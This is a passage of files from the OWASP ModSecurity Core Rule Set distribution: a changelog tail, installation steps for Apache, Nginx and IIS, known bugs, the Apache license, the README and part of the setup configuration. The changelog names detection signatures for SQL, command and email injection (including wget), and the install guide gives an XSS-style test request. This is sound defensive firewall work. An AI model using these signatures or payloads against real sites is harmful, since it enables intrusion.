rules. Therefore we moved all inspection rules to phase 2. version 1.4 build 2 - 2007-05-17 New Feature: * Search for signatures in XML content XML Content will be parsed and ispected for signatures New Events: * 950116 - Unicode Full/Half Width Abuse Attack Attempt Full-width unicode can by used to bypass content inspection. Such encoding will be forbidden * 960911 - Invalid HTTP request line Enforce request line to be valid, i.e.: ` ` * 960904 - Request Missing Content-Type (when there is content) When a request contains content, the content-type must be specified. If not, the content will not be inspected * 970018 - IIS installed in default location (any drive) Log once if IIS in installed in the /Inetpub directory (on any drive, not only C) * 950019 - Email Injection Web forms used for sending mail (such as "tell a friend") are often manipulated by spammers for sending anonymous emails Regular expressions fixes: * Further optimization of some regular expressions (using the non-greediness operator) The non-greediness operator, , prevents excessive backtracking FP fixes: * Rule 950107 - Will allow a parameter to end in a % sign from now on version 1.4 - 2007-05-02 New Events: * 970021 - WebLogic information disclosure Matching of `"JSP compile error"` in the response body, will trigger this rule, with severity 4 (Warning) * 950015,950910,950911 - HTTP Response Splitting Looking for HTTP Response Splitting patterns as described in Amit Klein's excellent white paper: ModSecurity does not support compressed content at the moment. Thus, the following rules have been added: * 960902 - Content-Encoding in request not supported Any incoming compressed request will be denied * 960903 - Content-Encoding in response not supported An outgoing compressed response will be logged to alert, but ONLY ONCE. False Positives Fixes: * Removed <.exe>,<.shtml> from restricted extensions * Will not be looking for SQL Injection signatures ``,`` in the Via request header * Excluded Referer header from SQL injection, XSS and command injection rules * Excluded X-OS-Prefs header from command injection rule * Will be looking for command injection signatures in REQUEST_COOKIES|REQUEST_COOKIES_NAMES instead of REQUEST_HEADERS:Cookie. * Allowing charset specification in the Content-Type Additional rules logic: * Corrected match of OPTIONS method in event 960015 * Changed location for event 960014 (proxy access) to REQUEST_URI_RAW * Moved all rules apart from method inspection from phase 1 to phase 2 - This will enable viewing content if such a rule triggers as well as setting exceptions using Apache scope tags. * Added match for double quote in addition to single quote for `` signature (SQL Injection) * Added 1=1 signature (SQL Injection) version 1.3.2 build 4 2007-01-17 Fixed apache 2.4 dummy requests exclusion Added persistent PDF UXSS detection rule ## Version 1.3.2 build 3 2007-01-10 Fixed regular expression in rule 960010 (file #30) to allow multipart form data content ## Version 1.3.2 - 2006-12-27 New events: * 960037 Directory is restricted by policy * 960038 HTTP header is restricted by policy Regular expressions fixes: * Regular expressions with @ at end of beginning (for example "@import) * Regular expressions with un-escaped "." * Command Injections now always require certain characters both before and after the command. Important since many are common English words (finger, mail) * The command injection wget is not searched in the UA header as it has different meaning there. * LDAP Fixed to reduce FPs: * More accurate regular expressions * high bit characters not accpeted between signature tokens. * Do not detect Include modsecurity.d/owasp-modsecurity-crs/crs-setup.conf Include modsecurity.d/owasp-modsecurity-crs/rules/*.conf ``` 8. Restart web server and ensure it starts without errors 9. Make sure your web sites are still running fine. 10. Proceed to the section "Testing the Installation" below. Installing on Nginx ------------------- 1. Compile ModSecurity into Nginx 2. Ensure that ModSecurity is loading correctly by checking error.log at start up for lines indicating ModSecurity is installed. An example might appear as follows: ```ModSecurity for nginx (STABLE)/2.9.1 (http://www.modsecurity.org/) configured.``` 3. The most common method of deploying ModSecurity we have seen is to create a new folder underneath the Nginx directory (typically /usr/local/nginx/conf/). Often this folder is called 'owasp-modsecurity-crs'. Create this folder and cd into it. 4. Download our release from https://coreruleset.org/installation/ and unpack it into a new owasp-modsecurity-crs folder. 5. Move the crs-setup.conf.example file to crs-setup.conf. Please take this time to go through this file and customize the settings for your local environment. Failure to do so may result in false negatives and false positives. See the section entitled OWASP CRS Configuration for more detail. 6. Rename rules/REQUEST-900-EXCLUSION-RULES-BEFORE-CRS.conf.example and rules/RESPONSE-999-EXCLUSION-RULES-AFTER-CRS.conf.example to remove the '.example' extension. This will allow you to add exceptions without updates overwriting them in the future. 7. Nginx requires the configuration of a single ModSecurity configuration file within the nginx.conf file using the 'ModSecurityConfig' directive (when using ModSecurity 2.x). Best practice is to set 'ModSecurityConfig' to a file from which you will include your other ModSecurity configuration files. In this example we will use: ```ModSecurityConfig modsec_includes.conf;``` 7. Within modsec_includes.conf create your includes to the CRS folder similar to as follows (The modsecurity.conf file from the ModSecurity installation is included in this example): ``` include modsecurity.conf include owasp-modsecurity-crs/crs-setup.conf include owasp-modsecurity-crs/rules/REQUEST-900-EXCLUSION-RULES-BEFORE-CRS.conf include owasp-modsecurity-crs/rules/REQUEST-901-INITIALIZATION.conf include owasp-modsecurity-crs/rules/REQUEST-903.9001-DRUPAL-EXCLUSION-RULES.conf include owasp-modsecurity-crs/rules/REQUEST-903.9002-WORDPRESS-EXCLUSION-RULES.conf include owasp-modsecurity-crs/rules/REQUEST-903.9003-NEXTCLOUD-EXCLUSION-RULES.conf include owasp-modsecurity-crs/rules/REQUEST-903.9004-DOKUWIKI-EXCLUSION-RULES.conf include owasp-modsecurity-crs/rules/REQUEST-903.9005-CPANEL-EXCLUSION-RULES.conf include owasp-modsecurity-crs/rules/REQUEST-903.9006-XENFORO-EXCLUSION-RULES.conf include owasp-modsecurity-crs/rules/REQUEST-905-COMMON-EXCEPTIONS.conf include owasp-modsecurity-crs/rules/REQUEST-910-IP-REPUTATION.conf include owasp-modsecurity-crs/rules/REQUEST-911-METHOD-ENFORCEMENT.conf include owasp-modsecurity-crs/rules/REQUEST-912-DOS-PROTECTION.conf include owasp-modsecurity-crs/rules/REQUEST-913-SCANNER-DETECTION.conf include owasp-modsecurity-crs/rules/REQUEST-920-PROTOCOL-ENFORCEMENT.conf include owasp-modsecurity-crs/rules/REQUEST-921-PROTOCOL-ATTACK.conf include owasp-modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf include owasp-modsecurity-crs/rules/REQUEST-931-APPLICATION-ATTACK-RFI.conf include owasp-modsecurity-crs/rules/REQUEST-932-APPLICATION-ATTACK-RCE.conf include owasp-modsecurity-crs/rules/REQUEST-933-APPLICATION-ATTACK-PHP.conf include owasp-modsecurity-crs/rules/REQUEST-934-APPLICATION-ATTACK-NODEJS.conf include owasp-modsecurity-crs/rules/REQUEST-941-APPLICATION-ATTACK-XSS.conf include owasp-modsecurity-crs/rules/REQUEST-942-APPLICATION-ATTACK-SQLI.conf include owasp-modsecurity-crs/rules/REQUEST-943-APPLICATION-ATTACK-SESSION-FIXATION.conf include owasp-modsecurity-crs/rules/REQUEST-944-APPLICATION-ATTACK-JAVA.conf include owasp-modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf include owasp-modsecurity-crs/rules/RESPONSE-950-DATA-LEAKAGES.conf include owasp-modsecurity-crs/rules/RESPONSE-951-DATA-LEAKAGES-SQL.conf include owasp-modsecurity-crs/rules/RESPONSE-952-DATA-LEAKAGES-JAVA.conf include owasp-modsecurity-crs/rules/RESPONSE-953-DATA-LEAKAGES-PHP.conf include owasp-modsecurity-crs/rules/RESPONSE-954-DATA-LEAKAGES-IIS.conf include owasp-modsecurity-crs/rules/RESPONSE-959-BLOCKING-EVALUATION.conf include owasp-modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf include owasp-modsecurity-crs/rules/RESPONSE-999-EXCLUSION-RULES-AFTER-CRS.conf ``` 8. Restart web server and ensure it starts without errors 9. Make sure your web sites are still running fine. 10. Proceed to the section "Testing the Installation" below. Installing on IIS ----------------- The IIS installer comes with an optional version of CRS built in. To upgrade or install this after the fact follow the following steps. 1. Navigate to "[drive_letters]:\Program Files\ModSecurity IIS\" 2. Download our release from https://coreruleset.org/installation/ and unpack it into the current folder. 3. Move the crs-setup.conf.example file to crs-setup.conf. Please take this time to go through this file and customize the settings for your local environment. Failure to do so may result in false negatives and false positives. See the section entitled OWASP CRS Configuration for more detail. 4. Rename rules/REQUEST-900-EXCLUSION-RULES-BEFORE-CRS.conf.example and rules/RESPONSE-999-EXCLUSION-RULES-AFTER-CRS.conf.example to remove the '.example' extension. This will allow you to add exceptions without updates overwriting them in the future. 5. Navigate back to the 'ModSecurity IIS' folder and modify the 'modsecurity_iis' to include the following: ``` include owasp-modsecurity-crs/crs-setup.conf include owasp-modsecurity-crs/rules/REQUEST-900-EXCLUSION-RULES-BEFORE-CRS.conf include owasp-modsecurity-crs/rules/REQUEST-901-INITIALIZATION.conf include owasp-modsecurity-crs/rules/REQUEST-905-COMMON-EXCEPTIONS.conf include owasp-modsecurity-crs/rules/REQUEST-910-IP-REPUTATION.conf include owasp-modsecurity-crs/rules/REQUEST-911-METHOD-ENFORCEMENT.conf include owasp-modsecurity-crs/rules/REQUEST-912-DOS-PROTECTION.conf include owasp-modsecurity-crs/rules/REQUEST-913-SCANNER-DETECTION.conf include owasp-modsecurity-crs/rules/REQUEST-920-PROTOCOL-ENFORCEMENT.conf include owasp-modsecurity-crs/rules/REQUEST-921-PROTOCOL-ATTACK.conf include owasp-modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf include owasp-modsecurity-crs/rules/REQUEST-931-APPLICATION-ATTACK-RFI.conf include owasp-modsecurity-crs/rules/REQUEST-932-APPLICATION-ATTACK-RCE.conf include owasp-modsecurity-crs/rules/REQUEST-933-APPLICATION-ATTACK-PHP.conf include owasp-modsecurity-crs/rules/REQUEST-941-APPLICATION-ATTACK-XSS.conf include owasp-modsecurity-crs/rules/REQUEST-942-APPLICATION-ATTACK-SQLI.conf include owasp-modsecurity-crs/rules/REQUEST-943-APPLICATION-ATTACK-SESSION-FIXATION.conf include owasp-modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf include owasp-modsecurity-crs/rules/RESPONSE-950-DATA-LEAKAGES.conf include owasp-modsecurity-crs/rules/RESPONSE-951-DATA-LEAKAGES-SQL.conf include owasp-modsecurity-crs/rules/RESPONSE-952-DATA-LEAKAGES-JAVA.conf include owasp-modsecurity-crs/rules/RESPONSE-953-DATA-LEAKAGES-PHP.conf include owasp-modsecurity-crs/rules/RESPONSE-954-DATA-LEAKAGES-IIS.conf include owasp-modsecurity-crs/rules/RESPONSE-959-BLOCKING-EVALUATION.conf include owasp-modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf include owasp-modsecurity-crs/rules/RESPONSE-999-EXCLUSION-RULES-AFTER-CRS.conf ``` 6. Restart web server and ensure it starts without errors 7. Make sure your web sites are still running fine. 8. Proceed to the section "Testing the Installation" below. Testing the Installation ======================== To test your installation you should be able to use any number of attacks. A typical request which should trigger CRS would be ```http://localhost/?param=">``` Upon sending this request you should see events reported in the error log (nginx apache) or the event viewer (IIS). If have not changed the defaults with regards to anomaly scoring, blocking and sampling percentage, then this request should have been blocked and access forbidden. Likewise if you have configured ModSecurity debug logging and/or audit logging this event should log to these locations as well. OWASP CRS Configuration ======================= The crs-setup.conf file includes management rules and directives that can control important CRS functions. The crs-setup.conf file comes with extensive comments. This section here brings only the essential parts. By default we do not include settings within the crs-setup.conf that configure ModSecurity itself. Instead those configuration settings are set during the installation of ModSecurity proper. An example for such such a configuration file is available via the ModSecurity project (https://github.com/SpiderLabs/ModSecurity/blob/master/modsecurity.conf-recommended). Be aware the crs-setup.conf file DOES specify configuration directives such as SecDefaultAction. The default is the anomaly scoring mode with the appropriate SecDefaultAction as defined in the crs-setup.conf. Alternative configuration modes are supported and explained in crs-setup.conf. The default anomaly/correlation mode establishes an incoming anomaly score threshold of 5 and an outgoing anomaly score threshold of 4. The default installation has been tuned to reduce false positives in a way that will allow most requests to pass in this default setup. However, testing the setup and tuning false positives before going to production is vital. This is especially true if you raise the paranoia level with is set to 1 by default. Higher paranoia levels ranging from 2 to 4 include more aggressive rules which will raise additional false positives but also raise the security level of your service. If you are unsure about the performance impact of the CRS or if you are unsure about the number of false positives, then you may want to use the sampling percentage. This number, which is set to 100 by default, controls the percentage of requests which is funneled into the CRS. Fresh installs on high traffic sites are advised to start with a low, or very low number of percentages and raise the number slowly up to 100. Be aware that any number below 100 allows a random number of requests to bypass the ruleset completely. Update the TX policy settings for allowed Request Methods, File Extensions, maximum numbers of arguments, etc to better reflect your environment that is being protected. Make sure your GeoIP and Project Honeypot settings are specified if you are using them. The GeoIP database is no longer included with the CRS. Instead you are advised to download it regularly. The use of Project Honeypot requires a free API key. These require an account but can be obtained at https://www.projecthoneypot.org/httpbl_configure.php. Be sure to check out the other settings present within the crs-setup.conf file. There are many other options that have to do with aspects of web application security that are beyond this document but are well explained in crs-setup.conf. modsecurity-crs-3.3.5/KNOWN_BUGS000066400000000000000000000054221446122515100163210ustar00rootroot00000000000000== OWASP ModSecurity Core Rule Set (CRS) KNOWN BUGS == == Report Bugs/Issues to GitHub Issues Tracker or the mailinglist == * https://github.com/SpiderLabs/owasp-modsecurity-crs/issues or the CRS Google Group at * https://groups.google.com/a/owasp.org/forum/#!forum/modsecurity-core-rule-set-project * There are still false positives for standard web applications in the default install (paranoia level 1). Please report these when you encounter them. False Positives from paranoia level 2 rules are less interesting, as we expect users to write exclusion rules for their alerts in the higher paranoia levels. * Permanent blocking of clients is based on a previous user agent / IP combination. Changing the user agent will thus allow to bypass this new filter. The plan is to allow for a purely IP based filter in the future. * Apache 2.4 prior to 2.4.11 is affected by a bug in parsing multi-line configuration directives, which causes Apache to fail during startup with an error such as: Error parsing actions: Unknown action: \\ Action 'configtest' failed. This bug is known to plague RHEL/Centos 7 below v7.4 or httpd v2.4.6 release 67 and Ubuntu 14.04 LTS users. https://bz.apache.org/bugzilla/show_bug.cgi?id=55910 We advise to upgrade your Apache version. If upgrading is not possible, we have provided a script in the util/join-multiline-rules directory which converts the rules into a format that works around the bug. You have to re-run this script whenever you modify or update the CRS rules. * Debian up to and including Jessie lacks YAJL/JSON support in ModSecurity, which causes the following error in the Apache ErrorLog or SecAuditLog: 'ModSecurity: JSON support was not enabled.' JSON support was enabled in Debian's package version 2.8.0-4 (Nov 2014). You can either use backports.debian.org to install the latest ModSecurity release or disable rule id 200001. * As of CRS version 3.0.1, support has been added for the application/soap+xml MIME type by default, as specified in RFC 3902. OF IMPORTANCE, application/soap+xml is indicative that XML will be provided. In accordance with this, ModSecurity's XML Request Body Processor should also be configured to support this MIME type. Within the ModSecurity project, commit 5e4e2af (https://github.com/SpiderLabs/ModSecurity/commit/5e4e2af7a6f07854fee6ed36ef4a381d4e03960e) has been merged to support this endeavour. However, if you are running a modified or preexisting version of the modsecurity.conf provided by this repository, you may wish to upgrade rule '200000' accordingly. The rule now appears as follows: ``` SecRule REQUEST_HEADERS:Content-Type "(?:application(?:/soap\+|/)|text/)xml" \ "id:'200000',phase:1,t:none,t:lowercase,pass,nolog,ctl:requestBodyProcessor=XML" ``` modsecurity-crs-3.3.5/LICENSE000066400000000000000000000261461446122515100156750ustar00rootroot00000000000000 Apache License Version 2.0, January 2004 http://www.apache.org/licenses/ TERMS AND CONDITIONS FOR USE, REPRODUCTION, AND DISTRIBUTION 1. Definitions. "License" shall mean the terms and conditions for use, reproduction, and distribution as defined by Sections 1 through 9 of this document. "Licensor" shall mean the copyright owner or entity authorized by the copyright owner that is granting the License. "Legal Entity" shall mean the union of the acting entity and all other entities that control, are controlled by, or are under common control with that entity. For the purposes of this definition, "control" means (i) the power, direct or indirect, to cause the direction or management of such entity, whether by contract or otherwise, or (ii) ownership of fifty percent (50%) or more of the outstanding shares, or (iii) beneficial ownership of such entity. "You" (or "Your") shall mean an individual or Legal Entity exercising permissions granted by this License. "Source" form shall mean the preferred form for making modifications, including but not limited to software source code, documentation source, and configuration files. "Object" form shall mean any form resulting from mechanical transformation or translation of a Source form, including but not limited to compiled object code, generated documentation, and conversions to other media types. "Work" shall mean the work of authorship, whether in Source or Object form, made available under the License, as indicated by a copyright notice that is included in or attached to the work (an example is provided in the Appendix below). "Derivative Works" shall mean any work, whether in Source or Object form, that is based on (or derived from) the Work and for which the editorial revisions, annotations, elaborations, or other modifications represent, as a whole, an original work of authorship. For the purposes of this License, Derivative Works shall not include works that remain separable from, or merely link (or bind by name) to the interfaces of, the Work and Derivative Works thereof. "Contribution" shall mean any work of authorship, including the original version of the Work and any modifications or additions to that Work or Derivative Works thereof, that is intentionally submitted to Licensor for inclusion in the Work by the copyright owner or by an individual or Legal Entity authorized to submit on behalf of the copyright owner. For the purposes of this definition, "submitted" means any form of electronic, verbal, or written communication sent to the Licensor or its representatives, including but not limited to communication on electronic mailing lists, source code control systems, and issue tracking systems that are managed by, or on behalf of, the Licensor for the purpose of discussing and improving the Work, but excluding communication that is conspicuously marked or otherwise designated in writing by the copyright owner as "Not a Contribution." "Contributor" shall mean Licensor and any individual or Legal Entity on behalf of whom a Contribution has been received by Licensor and subsequently incorporated within the Work. 2. Grant of Copyright License. Subject to the terms and conditions of this License, each Contributor hereby grants to You a perpetual, worldwide, non-exclusive, no-charge, royalty-free, irrevocable copyright license to reproduce, prepare Derivative Works of, publicly display, publicly perform, sublicense, and distribute the Work and such Derivative Works in Source or Object form. 3. Grant of Patent License. Subject to the terms and conditions of this License, each Contributor hereby grants to You a perpetual, worldwide, non-exclusive, no-charge, royalty-free, irrevocable (except as stated in this section) patent license to make, have made, use, offer to sell, sell, import, and otherwise transfer the Work, where such license applies only to those patent claims licensable by such Contributor that are necessarily infringed by their Contribution(s) alone or by combination of their Contribution(s) with the Work to which such Contribution(s) was submitted. If You institute patent litigation against any entity (including a cross-claim or counterclaim in a lawsuit) alleging that the Work or a Contribution incorporated within the Work constitutes direct or contributory patent infringement, then any patent licenses granted to You under this License for that Work shall terminate as of the date such litigation is filed. 4. Redistribution. You may reproduce and distribute copies of the Work or Derivative Works thereof in any medium, with or without modifications, and in Source or Object form, provided that You meet the following conditions: (a) You must give any other recipients of the Work or Derivative Works a copy of this License; and (b) You must cause any modified files to carry prominent notices stating that You changed the files; and (c) You must retain, in the Source form of any Derivative Works that You distribute, all copyright, patent, trademark, and attribution notices from the Source form of the Work, excluding those notices that do not pertain to any part of the Derivative Works; and (d) If the Work includes a "NOTICE" text file as part of its distribution, then any Derivative Works that You distribute must include a readable copy of the attribution notices contained within such NOTICE file, excluding those notices that do not pertain to any part of the Derivative Works, in at least one of the following places: within a NOTICE text file distributed as part of the Derivative Works; within the Source form or documentation, if provided along with the Derivative Works; or, within a display generated by the Derivative Works, if and wherever such third-party notices normally appear. The contents of the NOTICE file are for informational purposes only and do not modify the License. You may add Your own attribution notices within Derivative Works that You distribute, alongside or as an addendum to the NOTICE text from the Work, provided that such additional attribution notices cannot be construed as modifying the License. You may add Your own copyright statement to Your modifications and may provide additional or different license terms and conditions for use, reproduction, or distribution of Your modifications, or for any such Derivative Works as a whole, provided Your use, reproduction, and distribution of the Work otherwise complies with the conditions stated in this License. 5. Submission of Contributions. Unless You explicitly state otherwise, any Contribution intentionally submitted for inclusion in the Work by You to the Licensor shall be under the terms and conditions of this License, without any additional terms or conditions. Notwithstanding the above, nothing herein shall supersede or modify the terms of any separate license agreement you may have executed with Licensor regarding such Contributions. 6. Trademarks. This License does not grant permission to use the trade names, trademarks, service marks, or product names of the Licensor, except as required for reasonable and customary use in describing the origin of the Work and reproducing the content of the NOTICE file. 7. Disclaimer of Warranty. Unless required by applicable law or agreed to in writing, Licensor provides the Work (and each Contributor provides its Contributions) on an "AS IS" BASIS, WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied, including, without limitation, any warranties or conditions of TITLE, NON-INFRINGEMENT, MERCHANTABILITY, or FITNESS FOR A PARTICULAR PURPOSE. You are solely responsible for determining the appropriateness of using or redistributing the Work and assume any risks associated with Your exercise of permissions under this License. 8. Limitation of Liability. In no event and under no legal theory, whether in tort (including negligence), contract, or otherwise, unless required by applicable law (such as deliberate and grossly negligent acts) or agreed to in writing, shall any Contributor be liable to You for damages, including any direct, indirect, special, incidental, or consequential damages of any character arising as a result of this License or out of the use or inability to use the Work (including but not limited to damages for loss of goodwill, work stoppage, computer failure or malfunction, or any and all other commercial damages or losses), even if such Contributor has been advised of the possibility of such damages. 9. Accepting Warranty or Additional Liability. While redistributing the Work or Derivative Works thereof, You may choose to offer, and charge a fee for, acceptance of support, warranty, indemnity, or other liability obligations and/or rights consistent with this License. However, in accepting such obligations, You may act only on Your own behalf and on Your sole responsibility, not on behalf of any other Contributor, and only if You agree to indemnify, defend, and hold each Contributor harmless for any liability incurred by, or claims asserted against, such Contributor by reason of your accepting any such warranty or additional liability. END OF TERMS AND CONDITIONS APPENDIX: How to apply the Apache License to your work. To apply the Apache License to your work, attach the following boilerplate notice, with the fields enclosed by brackets "[]" replaced with your own identifying information. (Don't include the brackets!) The text should be enclosed in the appropriate comment syntax for the file format. We also recommend that a file or class name and description of purpose be included on the same "printed page" as the copyright notice for easier identification within third-party archives. Copyright 2006 the OWASP Core Rule Set contributors Licensed under the Apache License, Version 2.0 (the "License"); you may not use this file except in compliance with the License. You may obtain a copy of the License at http://www.apache.org/licenses/LICENSE-2.0 Unless required by applicable law or agreed to in writing, software distributed under the License is distributed on an "AS IS" BASIS, WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the License for the specific language governing permissions and limitations under the License. modsecurity-crs-3.3.5/README.md000066400000000000000000000047421446122515100161450ustar00rootroot00000000000000![GHA build v3.3/dev](https://github.com/coreruleset/coreruleset/workflows/Regression%20Tests/badge.svg?branch=v3.3%2Fdev) ![GHA build v3.2/dev](https://github.com/coreruleset/coreruleset/workflows/Regression%20Tests/badge.svg?branch=v3.2%2Fdev) ![GHA build v3.1/dev](https://github.com/coreruleset/coreruleset/workflows/Regression%20Tests/badge.svg?branch=v3.1%2Fdev) [![OWASP Flagship](https://img.shields.io/badge/owasp-flagship%20project-38a047.svg)](https://owasp.org/projects/) [![CII Best Practices](https://bestpractices.coreinfrastructure.org/projects/1390/badge)](https://bestpractices.coreinfrastructure.org/projects/1390) [![License](https://img.shields.io/badge/License-Apache%202.0-blue.svg)](https://opensource.org/licenses/Apache-2.0) # OWASP ModSecurity Core Rule Set (CRS) The OWASP ModSecurity Core Rule Set (CRS) is a set of generic attack detection rules for use with ModSecurity or compatible web application firewalls. The CRS aims to protect web applications from a wide range of attacks, including the OWASP Top Ten, with a minimum of false alerts. ## CRS Resources Please see the [OWASP ModSecurity Core Rule Set page](https://coreruleset.org/) to get introduced to the CRS and view resources on installation, configuration, and working with the CRS. ## Contributing to the CRS We strive to make the OWASP ModSecurity CRS accessible to a wide audience of beginner and experienced users. We are interested in hearing any bug reports, false positive alert reports, evasions, usability issues, and suggestions for new detections. [Create an issue on GitHub](https://github.com/coreruleset/coreruleset/issues) to report a false positive or false negative (evasion). Please include your installed version and the relevant portions of your ModSecurity audit log. [Sign up for our Google Group](https://groups.google.com/a/owasp.org/forum/#!forum/modsecurity-core-rule-set-project) to ask general usage questions and participate in discussions on the CRS. Also [here](https://lists.owasp.org/pipermail/owasp-modsecurity-core-rule-set/index) you can find the archives for the previous mailing list. [Join the #coreruleset channel on OWASP Slack](http://owaspslack.com) to chat about the CRS. ## License Copyright (c) 2006-2020 Trustwave and contributors. All rights reserved. Copyright (c) 2021-2022 Core Rule Set project. All rights reserved. The OWASP ModSecurity Core Rule Set is distributed under Apache Software License (ASL) version 2. Please see the enclosed LICENSE file for full details. modsecurity-crs-3.3.5/SECURITY.md000066400000000000000000000001521446122515100164460ustar00rootroot00000000000000# Security Policy See policy here: https://github.com/coreruleset/coreruleset/blob/v4.0/dev/SECURITY.md modsecurity-crs-3.3.5/SPONSORS.md000066400000000000000000000002301446122515100164620ustar00rootroot00000000000000## GOLD SPONSORS * Edgio * Google * Microsoft * Nginx (Part of F5) * United Security Providers * VMWare ## SILVER SPONSORS * Bug Bounty Switzerland modsecurity-crs-3.3.5/crs-setup.conf.example000066400000000000000000001043101446122515100211040ustar00rootroot00000000000000# ------------------------------------------------------------------------ # OWASP ModSecurity Core Rule Set ver.3.3.5 # Copyright (c) 2006-2020 Trustwave and contributors. All rights reserved. # Copyright (c) 2021-2023 Core Rule Set project. All rights reserved. # # The OWASP ModSecurity Core Rule Set is distributed under # Apache Software License (ASL) version 2 # Please see the enclosed LICENSE file for full details. # ------------------------------------------------------------------------ # # -- [[ Introduction ]] -------------------------------------------------------- # # The OWASP ModSecurity Core Rule Set (CRS) is a set of generic attack # detection rules that provide a base level of protection for any web # application. They are written for the open source, cross-platform # ModSecurity Web Application Firewall. # # See also: # https://coreruleset.org/ # https://github.com/SpiderLabs/owasp-modsecurity-crs # https://www.owasp.org/index.php/Category:OWASP_ModSecurity_Core_Rule_Set_Project # # # -- [[ System Requirements ]] ------------------------------------------------- # # CRS requires ModSecurity version 2.8.0 or above. # We recommend to always use the newest ModSecurity version. # # The configuration directives/settings in this file are used to control # the OWASP ModSecurity CRS. These settings do **NOT** configure the main # ModSecurity settings (modsecurity.conf) such as SecRuleEngine, # SecRequestBodyAccess, SecAuditEngine, SecDebugLog, and XML processing. # # The CRS assumes that modsecurity.conf has been loaded. It is bundled with # ModSecurity. If you don't have it, you can get it from: # 2.x: https://raw.githubusercontent.com/SpiderLabs/ModSecurity/v2/master/modsecurity.conf-recommended # 3.x: https://raw.githubusercontent.com/SpiderLabs/ModSecurity/v3/master/modsecurity.conf-recommended # # The order of file inclusion in your webserver configuration should always be: # 1. modsecurity.conf # 2. crs-setup.conf (this file) # 3. rules/*.conf (the CRS rule files) # # Please refer to the INSTALL file for detailed installation instructions. # # # -- [[ Mode of Operation: Anomaly Scoring vs. Self-Contained ]] --------------- # # The CRS can run in two modes: # # -- [[ Anomaly Scoring Mode (default) ]] -- # In CRS3, anomaly mode is the default and recommended mode, since it gives the # most accurate log information and offers the most flexibility in setting your # blocking policies. It is also called "collaborative detection mode". # In this mode, each matching rule increases an 'anomaly score'. # At the conclusion of the inbound rules, and again at the conclusion of the # outbound rules, the anomaly score is checked, and the blocking evaluation # rules apply a disruptive action, by default returning an error 403. # # -- [[ Self-Contained Mode ]] -- # In this mode, rules apply an action instantly. This was the CRS2 default. # It can lower resource usage, at the cost of less flexibility in blocking policy # and less informative audit logs (only the first detected threat is logged). # Rules inherit the disruptive action that you specify (i.e. deny, drop, etc). # The first rule that matches will execute this action. In most cases this will # cause evaluation to stop after the first rule has matched, similar to how many # IDSs function. # # -- [[ Alert Logging Control ]] -- # In the mode configuration, you must also adjust the desired logging options. # There are three common options for dealing with logging. By default CRS enables # logging to the webserver error log (or Event viewer) plus detailed logging to # the ModSecurity audit log (configured under SecAuditLog in modsecurity.conf). # # - To log to both error log and ModSecurity audit log file, use: "log,auditlog" # - To log *only* to the ModSecurity audit log file, use: "nolog,auditlog" # - To log *only* to the error log file, use: "log,noauditlog" # # Examples for the various modes follow. # You must leave one of the following options enabled. # Note that you must specify the same line for phase:1 and phase:2. # # Default: Anomaly Scoring mode, log to error log, log to ModSecurity audit log # - By default, offending requests are blocked with an error 403 response. # - To change the disruptive action, see RESPONSE-999-EXCLUSION-RULES-AFTER-CRS.conf.example # and review section 'Changing the Disruptive Action for Anomaly Mode'. # - In Apache, you can use ErrorDocument to show a friendly error page or # perform a redirect: https://httpd.apache.org/docs/2.4/custom-error.html # SecDefaultAction "phase:1,log,auditlog,pass" SecDefaultAction "phase:2,log,auditlog,pass" # Example: Anomaly Scoring mode, log only to ModSecurity audit log # - By default, offending requests are blocked with an error 403 response. # - To change the disruptive action, see RESPONSE-999-EXCLUSION-RULES-AFTER-CRS.conf.example # and review section 'Changing the Disruptive Action for Anomaly Mode'. # - In Apache, you can use ErrorDocument to show a friendly error page or # perform a redirect: https://httpd.apache.org/docs/2.4/custom-error.html # # SecDefaultAction "phase:1,nolog,auditlog,pass" # SecDefaultAction "phase:2,nolog,auditlog,pass" # Example: Self-contained mode, return error 403 on blocking # - In this configuration the default disruptive action becomes 'deny'. After a # rule triggers, it will stop processing the request and return an error 403. # - You can also use a different error status, such as 404, 406, et cetera. # - In Apache, you can use ErrorDocument to show a friendly error page or # perform a redirect: https://httpd.apache.org/docs/2.4/custom-error.html # # SecDefaultAction "phase:1,log,auditlog,deny,status:403" # SecDefaultAction "phase:2,log,auditlog,deny,status:403" # Example: Self-contained mode, redirect back to homepage on blocking # - In this configuration the 'tag' action includes the Host header data in the # log. This helps to identify which virtual host triggered the rule (if any). # - Note that this might cause redirect loops in some situations; for example # if a Cookie or User-Agent header is blocked, it will also be blocked when # the client subsequently tries to access the homepage. You can also redirect # to another custom URL. # SecDefaultAction "phase:1,log,auditlog,redirect:'http://%{request_headers.host}/',tag:'Host: %{request_headers.host}'" # SecDefaultAction "phase:2,log,auditlog,redirect:'http://%{request_headers.host}/',tag:'Host: %{request_headers.host}'" # # -- [[ Paranoia Level Initialization ]] --------------------------------------- # # The Paranoia Level (PL) setting allows you to choose the desired level # of rule checks that will add to your anomaly scores. # # With each paranoia level increase, the CRS enables additional rules # giving you a higher level of security. However, higher paranoia levels # also increase the possibility of blocking some legitimate traffic due to # false alarms (also named false positives or FPs). If you use higher # paranoia levels, it is likely that you will need to add some exclusion # rules for certain requests and applications receiving complex input. # # - A paranoia level of 1 is default. In this level, most core rules # are enabled. PL1 is advised for beginners, installations # covering many different sites and applications, and for setups # with standard security requirements. # At PL1 you should face FPs rarely. If you encounter FPs, please # open an issue on the CRS GitHub site and don't forget to attach your # complete Audit Log record for the request with the issue. # - Paranoia level 2 includes many extra rules, for instance enabling # many regexp-based SQL and XSS injection protections, and adding # extra keywords checked for code injections. PL2 is advised # for moderate to experienced users desiring more complete coverage # and for installations with elevated security requirements. # PL2 comes with some FPs which you need to handle. # - Paranoia level 3 enables more rules and keyword lists, and tweaks # limits on special characters used. PL3 is aimed at users experienced # at the handling of FPs and at installations with a high security # requirement. # - Paranoia level 4 further restricts special characters. # The highest level is advised for experienced users protecting # installations with very high security requirements. Running PL4 will # likely produce a very high number of FPs which have to be # treated before the site can go productive. # # All rules will log their PL to the audit log; # example: [tag "paranoia-level/2"]. This allows you to deduct from the # audit log how the WAF behavior is affected by paranoia level. # # It is important to also look into the variable # 